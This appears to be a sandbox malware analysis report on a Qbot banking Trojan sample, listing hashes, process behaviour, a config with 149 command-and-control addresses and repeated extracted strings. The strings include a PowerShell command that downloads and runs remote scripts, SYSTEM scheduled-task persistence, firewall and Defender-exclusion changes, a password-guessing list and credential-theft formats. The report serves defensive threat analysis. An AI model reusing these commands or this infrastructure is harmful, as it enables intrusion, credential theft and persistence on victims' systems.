File name:

8888888.png

Full analysis: https://app.any.run/tasks/32ce908c-d4f1-4993-9e3d-a0fdf6bf8b79
Verdict: Malicious activity
Threats:

Qbot is a banking Trojan — a malware designed to collect banking information from victims. Qbot targets organizations mostly in the US. It is equipped with various sophisticated evasion and info-stealing functions and worm-like functionality, and a strong persistence mechanism.

Malware Trends Tracker     >>>
Analysis date: December 05, 2024, 02:13:07
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
qbot
trojan
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

136B9C85525BA66276B8C9F6B7014B0B

SHA1:

0CF5BA13D14C28C60586C7F4B9679925FA4D4172

SHA256:

A23EF053CCCF6A35FDA9ADC5F1702BA99A7BE695107D3BA5D1EA8C9C258299E4

SSDEEP:

6144:JanAo3boaSrTBRc6nWF84LvSkgNSjEtIovH6DgJG3uhRtSUgnSt9BYbC38g/T4J:JaAKoRrTBHWC4LINSjA/EMGU/SHomaI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • QBOT has been detected (YARA)

      • 8888888.png.exe (PID: 1572)

    • Executing a file with an untrusted certificate

      • 8888888.png.exe (PID: 1572)
      • 8888888.png.exe (PID: 6668)
      • fsoevv.exe (PID: 2212)
      • fsoevv.exe (PID: 5000)

    • Qbot is detected

      • 8888888.png.exe (PID: 1572)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • 8888888.png.exe (PID: 1572)

    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 3988)

    • Process drops legitimate windows executable

      • cmd.exe (PID: 3988)

    • Application launched itself

      • 8888888.png.exe (PID: 1572)
      • fsoevv.exe (PID: 2212)

    • Starts itself from another location

      • 8888888.png.exe (PID: 1572)

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 3988)
      • 8888888.png.exe (PID: 1572)

  • INFO

    • Manual execution by a user

      • mspaint.exe (PID: 6692)

    • Checks supported languages

      • 8888888.png.exe (PID: 1572)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Qbot

(PID) Process(1572) 8888888.png.exe
Botnetspx133
Campaign1591267427
Version324.142
C2 (149)1.40.42.4:443
100.38.123.22:443
104.221.4.11:2222
104.50.141.139:995
105.184.48.142:443
108.27.217.44:443
108.31.92.113:443
108.51.73.186:443
108.58.9.238:993
108.58.9.238:995
128.234.46.27:443
134.0.196.46:995
137.103.143.124:443
140.82.21.191:443
142.129.227.86:443
151.73.126.205:443
173.172.205.216:443
173.175.29.210:443
173.187.169.73:443
173.22.120.11:2222
173.245.152.231:443
173.49.122.160:995
173.79.220.156:443
174.34.67.106:2222
175.111.128.234:443
176.193.41.32:2222
184.180.157.203:2222
184.98.104.7:995
185.246.9.69:995
188.192.75.8:443
188.192.75.8:995
188.27.71.163:443
189.140.112.184:443
189.159.133.162:995
197.165.178.49:443
2.88.183.192:443
203.33.139.134:443
207.162.184.228:443
207.255.161.8:2078
207.255.161.8:2087
207.255.161.8:2222
207.255.161.8:32102
207.255.161.8:32103
207.255.18.67:443
216.163.4.91:443
216.201.162.158:995
24.10.42.174:443
24.152.219.253:995
24.201.79.208:2078
24.226.137.154:443
24.42.14.241:443
24.43.22.220:443
24.43.22.220:995
24.46.40.189:2222
24.99.180.247:443
47.136.224.60:443
47.146.169.85:443
47.152.210.233:443
47.153.115.154:443
47.153.115.154:995
47.201.1.210:443
47.205.231.60:443
47.35.182.97:443
47.40.244.237:443
49.144.84.21:443
49.191.4.245:443
5.12.114.96:443
5.13.99.38:995
5.14.251.226:443
50.244.112.106:443
50.244.112.10:443
50.247.230.33:995
50.29.181.193:995
59.124.10.133:443
62.121.123.57:443
62.38.111.70:2222
64.121.114.87:443
64.19.74.29:995
65.131.83.170:995
65.24.76.114:443
66.222.88.126:995
66.26.160.37:443
67.131.59.17:443
67.209.195.198:3389
67.5.28.72:465
67.83.54.76:2222
68.174.15.223:443
69.245.144.167:443
69.28.222.54:443
69.40.17.142:443
69.92.54.95:995
70.174.3.241:443
70.183.127.6:995
71.163.225.75:443
71.185.60.227:443
71.187.170.235:443
71.77.231.251:443
71.80.66.107:443
71.88.104.107:995
72.16.212.108:465
72.177.157.217:995
72.183.129.56:443
72.190.101.70:443
72.204.242.138:2078
72.204.242.138:443
72.209.191.27:443
72.240.245.253:443
72.28.255.159:995
72.29.181.77:2078
72.69.180.183:61202
73.94.229.115:443
74.215.201.122:443
74.56.167.31:443
75.183.171.155:3389
75.81.25.223:443
75.87.161.32:995
76.15.41.32:443
76.170.77.99:443
76.187.8.160:443
77.237.181.212:995
78.96.192.26:443
78.97.145.242:443
79.113.219.121:443
79.115.128.221:443
79.117.161.67:21
79.119.67.149:443
80.195.103.146:2222
80.240.26.178:443
81.103.144.77:443
81.133.234.36:2222
82.127.193.151:2222
82.76.239.193:443
85.121.42.12:995
85.186.141.62:995
86.123.106.54:443
86.126.97.183:2222
89.44.195.186:2222
93.113.90.128:443
96.18.240.158:443
96.35.170.82:2222
96.37.137.42:443
96.41.93.96:443
96.56.237.174:993
97.93.211.17:443
98.114.185.3:443
98.115.138.61:443
98.118.156.172:443
98.219.77.197:443
98.32.60.217:443
SaltjHxastDcds)oMc=jvh7wdUhxcsdt2
Strings (456)/F
/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
/ru ""
[begin]
[end]
cookie=[%s]
data=[%s]
exe=[%s] cmdline=[%s] pid=[%u] username=[%s]
ext_ip=[%s] dnsname=[%s] hostname=[%s] user=[%S] domain=[%S] is_admin=[%s] os=[%s] qbot_version=[%s] install_time=[%s] exe=[%S] prod_id=[%s]
host=[%s:%u] user=[%s] pass=[%s]
referer=[%s]
url=[%s]
url=[%s] data=[%s]
url=[%s] lb=[%s] data=[%s]
url=[%s] user=[%s] pass=[%s]
"%s\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn %s /tr "\"%s\" /I %s" /SC ONCE /Z /ST %02u:%02u /ET %02u:%02u
"%s\system32\schtasks.exe" /DELETE /F /TN %s
"%s\system32\schtasks.exe" /create /tn %S /tr "%s" /sc %S
%%%BOT_NICK%%%
%02u.%02u.%02u-%02u/%02u/%04u
%BOTID%
%BOT_COMPUTERNAME%
%BOT_MACHINE_UUID%
%BOT_USERDOMAIN%
%BOT_USERNAME%
%BOT_VENDOR_ID%
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles(x86)%\Internet Explorer\iexplore.exe
%SystemRoot%\SysWOW64\explorer.exe
%SystemRoot%\SysWOW64\mobsync.exe
%SystemRoot%\SysWOW64\xwizard.exe
%SystemRoot%\System32\mobsync.exe
%SystemRoot%\System32\xwizard.exe
%SystemRoot%\explorer.exe
%s "$windowsupdate = \"%s\"; & $windowsupdate"
%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
%s \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%s%s/dupinst.php?n=%s&bg=%s&r=%u
%s\%s.vbs
%s\System32\WindowsPowerShell\v1.0\powershell.exe "$windowsupdate = \"%s\"; & $windowsupdate"
%s\System32\WindowsPowerShell\v1.0\powershell.exe \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%u.%s.%s.%08x
*/*
.cfg
.dat
.dll
.exe
.lnk
/bot_serv
/t3
000
1.nvprivateoffice.info
123,password,Password,letmein,1234,12345,123456,1234567,12345678,123456789,1234567890,qwerty,love,iloveyou,princess,pussy,master,monkey,abc123,99999999,9999999,999999,99999,9999,999,99,9,88888888,8888888,888888,88888,8888,888,88,8,77777777,7777777,777777,77777,7777,777,77,7,66666666,6666666,666666,6...
1234567890
2
23.49.13.33:7000
3
307
308
309
310
311
ADMIN$
ALLUSERSPROFILE
AdjustTokenPrivileges
Administrator
AllocateAndInitializeSid
AvastSvc.exe
ByteFence.exe
C$
C:\\INTERNAL\\__empty
CWSandbox
CertAddCRLContextToStore
CertAddCTLContextToStore
CertAddCertificateContextToStore
CertCloseStore
CertCreateCertificateChainEngine
CertDuplicateCRLContext
CertEnumCertificatesInStore
CertEnumSystemStore
CertFreeCRLContext
CertFreeCertificateChain
CertFreeCertificateChainEngine
CertFreeCertificateContext
CertGetCRLContextProperty
CertGetCertificateChain
CertGetEnhancedKeyUsage
CertGetNameStringW
CertOpenStore
CertSetCertificateContextProperty
CloseHandle
CloseServiceHandle
Content-Type: application/x-www-form-urlencoded
CreateDirectoryA
CreateFileA
CreateFileW
CreateProcessA
CreateProcessInternalW
CreateProcessW
CreateRemoteThread
CreateServiceW
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
CredEnumerateA
CredFree
CryptAcquireCertificatePrivateKey
CryptEnumOIDInfo
CryptFindOIDInfo
CryptUnprotectData
DefWindowProcA
DeleteFileA
DeleteService
DeleteServiceW
DeleteUrlCacheEntryW
DestroyWindow
DispatchMessageA
DnsQuery_A
DnsQuery_W
DynamicCodePolicy
EnumWindows
ExpandEnvironmentStringsA
Fiddler.exe;samp1e.exe;sample.exe;runsample.exe;lordpe.exe;regshot.exe;Autoruns.exe;dsniff.exe;VBoxTray.exe;HashMyFiles.exe;ProcessHacker.exe;Procmon.exe;Procmon64.exe;netmon.exe;vmtoolsd.exe;vm3dservice.exe;VGAuthService.exe;pr0c3xp.exe;ProcessHacker.exe;CFF Explorer.exe;dumpcap.exe;Wireshark.exe;i...
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
FindWindowA
FreeSid
FtpDeleteFileA
FtpGetFileA
FtpOpenFileA
GenuineIntel
GetClipboardData
GetCurrentDirectoryA
GetCurrentThreadId
GetForegroundWindow
GetMessageA
GetMessageW
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetUrlCacheEntryInfoW
GetVolumeInformationA
Global\{EEE80B68-1EF4-47C2-9017-59E46A84F3BC}
HOURLY /mo 5
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpQueryInfoW
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
IPC$
Initializing database...
InterlockedCompareExchange
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetGetCookieA
InternetGetCookieExA
InternetGetLastResponseInfoA
InternetOpenA
InternetOpenUrlA
InternetQueryDataAvailable
InternetQueryOptionA
InternetQueryOptionW
InternetReadFile
InternetReadFileExA
InternetSetOptionA
InternetSetStatusCallback
InternetWriteFile
LdrGetProcedureAddress
LdrLoadDll
LoadLibraryA
LoadResource
LocalFree
LookupAccountSidA
LookupAccountSidW
MBAMService.exe;mbamgui.exe
MessageBoxA
Microsoft
MicrosoftEdge.exe
Module32First
Module32Next
MoveFileA
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
MsMpEng.exe
NAT-PMP %u tcp
NetApiBufferFree
NetGetDCName
NetShareEnum
NetUserEnum
NetWkstaGetInfo
NtAllocateVirtualMemory
NtClose
NtCreateSection
NtFreeVirtualMemory
NtGetContextThread
NtMapViewOfSection
NtProtectVirtualMemory
NtQueryInformationProcess
NtQueryVirtualMemory
NtReadVirtualMemory
NtSetContextThread
NtUnmapViewOfSection
NtWow64QueryInformationProcess64
NtWow64ReadVirtualMemory64
NtWriteVirtualMemory
ObtainUserAgentString
OpenProcess
OpenSCManagerW
OpenThread
PFXExportCertStore
PR_Close
PR_GetError
PR_GetNameForIdentity
PR_OpenTCPSocket
PR_Read
PR_SetError
PR_Write
PStoreCreateInstance
PathCombineA
PathCombineW
PathMatchSpecA
PathMatchSpecW
PathUnquoteSpacesW
PeekMessageA
PeekMessageW
PostMessageA
PostQuitMessage
Process32First
Process32Next
ProfileImagePath
QEMU
QueryFullProcessImageNameW
Query_Main
RapportGP.DLL
ReadFile
ReadProcessMemory
Red Hat VirtIO
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryValueExA
RegSetValueExA
RegisterClassExA
RtlGetVersion
RtlNtStatusToDosError
RtlSetLastWin32Error
SAVAdminService.exe;SavService.exe
SOFTWARE\Microsoft\Internet Explorer\CodeIntegrity
SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\SpyNet
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
SbieDll.dll
Self test FAILED!!!
Self test OK.
SendMessageA
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'") For Each objFile in colFiles objFile.Copy("%s") Next
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul)
SetCurrentDirectoryA
SetEndOfFile
SetEntriesInAclA
SetFilePointer
SetLastError
SetNamedSecurityInfoA
ShellExecuteA
ShowWindow
SizeofResource
SpyNetReporting
StackWalk64
StartServiceW
StrCmpIW
StrCmpNIA
StrStrIA
StrStrIW
StrStrW
StrTrimW
SubmitSamplesConsent
TranslateMessage
UnregisterClassA
UpdateWindow
VBoxGuest
VBoxVideo
VMAUDIO
VMware Accelerated
VMware Pointing
VMware Replay
VMware SCSI
VMware SVGA
VMware VMaudio
VMware Vista
VMware server memory
Virtual HD
VirtualAllocEx
VirtualFreeEx
VirtualProtect
VirtualProtectEx
WBJ_IGNORE
WEEKLY /D TUE,WED,THU /ST 12:00:00
WNetAddConnection2W
WNetCancelConnection2W
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW
WRSA.exe
WSAConnect
WSAGetLastError
WSASend
WSASetLastError
WScript.Sleep %u Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul) WSCript.Sleep 2000 Set fso = CreateObject("Scripting.FileSystemObject")...
WTSEnumerateSessionsW
WTSFreeMemory
WTSQuerySessionInformationW
WTSQueryUserToken
WaitForSingleObject
Windows10 Edge HttpQueryInfo Bug!!!
WriteFile
WriteProcessMemory
ZwQueryInformationThread
ZwResumeThread
\sf2.dll
_decrypted.file;MultiAnalysis_v
aabcdeefghiijklmnoopqrstuuvwxyyz
aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
abc
abcdefghijklmnopqrstuvwxyz
administrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator
advapi32.dll
ansfltr
application/x-shockwave-flash
artifact.exe
aswhooka.dll
aswhookx.dll
avcuf32.dll
avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
avp.exe;kavtray.exe
bdagent.exe;vsserv.exe;vsservppl.exe
c1
c:\hiberfil.sysss
cashmanagementconnectionstring
ccSvcHst.exe
chrome.dll
chrome_child.dll
cmd /c schtasks.exe /Query > "%s"
cmd.exe /C \"start /MIN %s\system32\cscript.exe //E:javascript \"%s\"\" sudhfdus
cmd.exe /c ping -n 10 localhost && rmdir /S /Q "%s"
cmd=1&msg=%s&ports=
comet.yahoo.com;.hiro.tv;safebrowsing.google.com;geo.query.yahoo.com;googleusercontent.com;salesforce.com;officeapps.live.com;storage.live.com;messenger.live.com;.twimg.com;api.skype.com;mail.google.com;.bing.com;playtoga.com;.mozilla.com;.mozilla.org;hotbar.com;lphbs.com;contacts.msn.com;search.msn...
connect
coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
crypt32.dll
cryptui.dll
cscript.exe
data_after
data_before
data_end
data_inject
dbghelp.dll
dnsapi.dll
egui.exe;ekrn.exe
error res='%s' err=%d len=%u
exclude_url
explorer.exe
f1
firefox.exe
fmon.exe
fshoster32.exe
h1
h2
h3
https://
https://cdn.speedof.me/sample4096k.bin?r=0.%u
https://en.wikipedia.org/static/apple-touch/wikipedia.png
i1
i2
i3
i4
ignore_url
image/gif
image/jpeg
image/pjpeg
ivm-inject.dll
jHxastDcds)oMc=jvh7wdUhxcsdt2
k1
kb
kernel32.dll
m1
mcshield.exe
metsvc-server.exe
mlwr_smpl
mpr.dll
netapi32.dll
netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s" enable=yes
netsh firewall set allowedprogram "%s" %s ENABLE
netteller.com
npl
npq
nspr4.dll
nss3.dll
ntdll.dll
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command '%s'"
pstorec.dll
qbot_conf_path='%S' username='%S'
qbot_run_mutex='%s' username='%S'
reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
rsabase.dll
rsaenh.dll
s2
sample
sbtisht
send
set_url
shell32.dll
shlwapi.dll
siteadvisor.com;avgthreatlabs.com;safeweb.norton.com
snxhk_border_mywnd
srootkit
t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe
u1
urlmon.dll
user32.dll
vSockets
vkise.exe;isesrv.exe;cmdagent.exe
vm3dmp
vmacthlp.exe
vmdebug
vmnat.exe
vmrawdsk
vmscsi
vmtoolsd.exe
vmx_svga
vmxnet
w1
wbj.go
webinjects.cb
windbg.exe;ChromeUpdate.exe;msdev.exe;dbgview.exe;ollydbg.exe;ctfmon.exe;Proxifier.exe;nav.exe;Microsoft.Notes.exe;ShellExperienceHost.exe;SecHealthUI.exe
windump.exe
wininet.dll
wpcap.dll
ws2_32.dll
wtsapi32.dll
{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (35)
.exe | Win64 Executable (generic) (30.9)
.scr | Windows screen saver (14.6)
.dll | Win32 Dynamic Link Library (generic) (7.3)
.exe | Win32 Executable (generic) (5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2020:06:04 13:33:54+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 2.5
CodeSize: 1121280
InitializedDataSize: 91648
UninitializedDataSize: -
EntryPoint: 0x2950
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.8.0.1800
ProductVersionNumber: 1.8.0.1800
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
CompanyName: Lovelysoft
FileDescription: Remote Performance Expert Helper Object
FileVersion: 1.8.0.1800
InternalName: -
LegalCopyright: Copyright © 2008-2013 Lovelysoft. All rights reserved
LegalTrademarks: All trademarks are the property of their respective owners.
OriginalFileName: -
ProductName: AdminToys Suite
ProductVersion: 2012
Comments: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
137
Monitored processes
9
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start #QBOT 8888888.png.exe 8888888.png.exe no specs mspaint.exe no specs fsoevv.exe no specs cmd.exe conhost.exe no specs ping.exe no specs fsoevv.exe no specs explorer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
396C:\WINDOWS\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exefsoevv.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcp_win.dll
1572"C:\Users\admin\AppData\Local\Temp\8888888.png.exe" C:\Users\admin\AppData\Local\Temp\8888888.png.exe
explorer.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Remote Performance Expert Helper Object
Exit code:
0
Version:
1.8.0.1800
Modules
Images
c:\users\admin\appdata\local\temp\8888888.png.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
Qbot
(PID) Process(1572) 8888888.png.exe
Botnetspx133
Campaign1591267427
Version324.142
C2 (149)1.40.42.4:443
100.38.123.22:443
104.221.4.11:2222
104.50.141.139:995
105.184.48.142:443
108.27.217.44:443
108.31.92.113:443
108.51.73.186:443
108.58.9.238:993
108.58.9.238:995
128.234.46.27:443
134.0.196.46:995
137.103.143.124:443
140.82.21.191:443
142.129.227.86:443
151.73.126.205:443
173.172.205.216:443
173.175.29.210:443
173.187.169.73:443
173.22.120.11:2222
173.245.152.231:443
173.49.122.160:995
173.79.220.156:443
174.34.67.106:2222
175.111.128.234:443
176.193.41.32:2222
184.180.157.203:2222
184.98.104.7:995
185.246.9.69:995
188.192.75.8:443
188.192.75.8:995
188.27.71.163:443
189.140.112.184:443
189.159.133.162:995
197.165.178.49:443
2.88.183.192:443
203.33.139.134:443
207.162.184.228:443
207.255.161.8:2078
207.255.161.8:2087
207.255.161.8:2222
207.255.161.8:32102
207.255.161.8:32103
207.255.18.67:443
216.163.4.91:443
216.201.162.158:995
24.10.42.174:443
24.152.219.253:995
24.201.79.208:2078
24.226.137.154:443
24.42.14.241:443
24.43.22.220:443
24.43.22.220:995
24.46.40.189:2222
24.99.180.247:443
47.136.224.60:443
47.146.169.85:443
47.152.210.233:443
47.153.115.154:443
47.153.115.154:995
47.201.1.210:443
47.205.231.60:443
47.35.182.97:443
47.40.244.237:443
49.144.84.21:443
49.191.4.245:443
5.12.114.96:443
5.13.99.38:995
5.14.251.226:443
50.244.112.106:443
50.244.112.10:443
50.247.230.33:995
50.29.181.193:995
59.124.10.133:443
62.121.123.57:443
62.38.111.70:2222
64.121.114.87:443
64.19.74.29:995
65.131.83.170:995
65.24.76.114:443
66.222.88.126:995
66.26.160.37:443
67.131.59.17:443
67.209.195.198:3389
67.5.28.72:465
67.83.54.76:2222
68.174.15.223:443
69.245.144.167:443
69.28.222.54:443
69.40.17.142:443
69.92.54.95:995
70.174.3.241:443
70.183.127.6:995
71.163.225.75:443
71.185.60.227:443
71.187.170.235:443
71.77.231.251:443
71.80.66.107:443
71.88.104.107:995
72.16.212.108:465
72.177.157.217:995
72.183.129.56:443
72.190.101.70:443
72.204.242.138:2078
72.204.242.138:443
72.209.191.27:443
72.240.245.253:443
72.28.255.159:995
72.29.181.77:2078
72.69.180.183:61202
73.94.229.115:443
74.215.201.122:443
74.56.167.31:443
75.183.171.155:3389
75.81.25.223:443
75.87.161.32:995
76.15.41.32:443
76.170.77.99:443
76.187.8.160:443
77.237.181.212:995
78.96.192.26:443
78.97.145.242:443
79.113.219.121:443
79.115.128.221:443
79.117.161.67:21
79.119.67.149:443
80.195.103.146:2222
80.240.26.178:443
81.103.144.77:443
81.133.234.36:2222
82.127.193.151:2222
82.76.239.193:443
85.121.42.12:995
85.186.141.62:995
86.123.106.54:443
86.126.97.183:2222
89.44.195.186:2222
93.113.90.128:443
96.18.240.158:443
96.35.170.82:2222
96.37.137.42:443
96.41.93.96:443
96.56.237.174:993
97.93.211.17:443
98.114.185.3:443
98.115.138.61:443
98.118.156.172:443
98.219.77.197:443
98.32.60.217:443
SaltjHxastDcds)oMc=jvh7wdUhxcsdt2
Strings (456)/F
/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
/ru ""
[begin]
[end]
cookie=[%s]
data=[%s]
exe=[%s] cmdline=[%s] pid=[%u] username=[%s]
ext_ip=[%s] dnsname=[%s] hostname=[%s] user=[%S] domain=[%S] is_admin=[%s] os=[%s] qbot_version=[%s] install_time=[%s] exe=[%S] prod_id=[%s]
host=[%s:%u] user=[%s] pass=[%s]
referer=[%s]
url=[%s]
url=[%s] data=[%s]
url=[%s] lb=[%s] data=[%s]
url=[%s] user=[%s] pass=[%s]
"%s\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn %s /tr "\"%s\" /I %s" /SC ONCE /Z /ST %02u:%02u /ET %02u:%02u
"%s\system32\schtasks.exe" /DELETE /F /TN %s
"%s\system32\schtasks.exe" /create /tn %S /tr "%s" /sc %S
%%%BOT_NICK%%%
%02u.%02u.%02u-%02u/%02u/%04u
%BOTID%
%BOT_COMPUTERNAME%
%BOT_MACHINE_UUID%
%BOT_USERDOMAIN%
%BOT_USERNAME%
%BOT_VENDOR_ID%
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles(x86)%\Internet Explorer\iexplore.exe
%SystemRoot%\SysWOW64\explorer.exe
%SystemRoot%\SysWOW64\mobsync.exe
%SystemRoot%\SysWOW64\xwizard.exe
%SystemRoot%\System32\mobsync.exe
%SystemRoot%\System32\xwizard.exe
%SystemRoot%\explorer.exe
%s "$windowsupdate = \"%s\"; & $windowsupdate"
%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
%s \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%s%s/dupinst.php?n=%s&bg=%s&r=%u
%s\%s.vbs
%s\System32\WindowsPowerShell\v1.0\powershell.exe "$windowsupdate = \"%s\"; & $windowsupdate"
%s\System32\WindowsPowerShell\v1.0\powershell.exe \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%u.%s.%s.%08x
*/*
.cfg
.dat
.dll
.exe
.lnk
/bot_serv
/t3
000
1.nvprivateoffice.info
123,password,Password,letmein,1234,12345,123456,1234567,12345678,123456789,1234567890,qwerty,love,iloveyou,princess,pussy,master,monkey,abc123,99999999,9999999,999999,99999,9999,999,99,9,88888888,8888888,888888,88888,8888,888,88,8,77777777,7777777,777777,77777,7777,777,77,7,66666666,6666666,666666,6...
1234567890
2
23.49.13.33:7000
3
307
308
309
310
311
ADMIN$
ALLUSERSPROFILE
AdjustTokenPrivileges
Administrator
AllocateAndInitializeSid
AvastSvc.exe
ByteFence.exe
C$
C:\\INTERNAL\\__empty
CWSandbox
CertAddCRLContextToStore
CertAddCTLContextToStore
CertAddCertificateContextToStore
CertCloseStore
CertCreateCertificateChainEngine
CertDuplicateCRLContext
CertEnumCertificatesInStore
CertEnumSystemStore
CertFreeCRLContext
CertFreeCertificateChain
CertFreeCertificateChainEngine
CertFreeCertificateContext
CertGetCRLContextProperty
CertGetCertificateChain
CertGetEnhancedKeyUsage
CertGetNameStringW
CertOpenStore
CertSetCertificateContextProperty
CloseHandle
CloseServiceHandle
Content-Type: application/x-www-form-urlencoded
CreateDirectoryA
CreateFileA
CreateFileW
CreateProcessA
CreateProcessInternalW
CreateProcessW
CreateRemoteThread
CreateServiceW
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
CredEnumerateA
CredFree
CryptAcquireCertificatePrivateKey
CryptEnumOIDInfo
CryptFindOIDInfo
CryptUnprotectData
DefWindowProcA
DeleteFileA
DeleteService
DeleteServiceW
DeleteUrlCacheEntryW
DestroyWindow
DispatchMessageA
DnsQuery_A
DnsQuery_W
DynamicCodePolicy
EnumWindows
ExpandEnvironmentStringsA
Fiddler.exe;samp1e.exe;sample.exe;runsample.exe;lordpe.exe;regshot.exe;Autoruns.exe;dsniff.exe;VBoxTray.exe;HashMyFiles.exe;ProcessHacker.exe;Procmon.exe;Procmon64.exe;netmon.exe;vmtoolsd.exe;vm3dservice.exe;VGAuthService.exe;pr0c3xp.exe;ProcessHacker.exe;CFF Explorer.exe;dumpcap.exe;Wireshark.exe;i...
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
FindWindowA
FreeSid
FtpDeleteFileA
FtpGetFileA
FtpOpenFileA
GenuineIntel
GetClipboardData
GetCurrentDirectoryA
GetCurrentThreadId
GetForegroundWindow
GetMessageA
GetMessageW
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetUrlCacheEntryInfoW
GetVolumeInformationA
Global\{EEE80B68-1EF4-47C2-9017-59E46A84F3BC}
HOURLY /mo 5
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpQueryInfoW
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
IPC$
Initializing database...
InterlockedCompareExchange
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetGetCookieA
InternetGetCookieExA
InternetGetLastResponseInfoA
InternetOpenA
InternetOpenUrlA
InternetQueryDataAvailable
InternetQueryOptionA
InternetQueryOptionW
